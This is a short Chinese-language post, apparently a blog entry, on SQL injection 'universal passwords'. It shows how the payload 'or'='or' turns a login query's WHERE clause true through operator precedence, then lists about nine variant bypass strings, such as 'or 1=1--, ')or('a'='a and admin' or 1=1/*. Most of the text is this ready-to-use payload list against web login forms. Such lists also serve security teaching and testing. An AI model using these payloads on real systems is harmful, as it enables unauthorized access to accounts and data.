1. 程式人生 > >SQL注入之萬能密碼

SQL注入之萬能密碼

萬能密碼形式:'or'='or' 

例如:select * from table where username='' or '=' or '' and password='';   //and優先於or,且'='為真

類似形式還有:

"or"a"="a     

')or('a'='a

")or("a"="a

'or 1=1--

"or 1=1--

'or"='

'or 1=1%00

'or 1=1/*

admin' or 1=1/*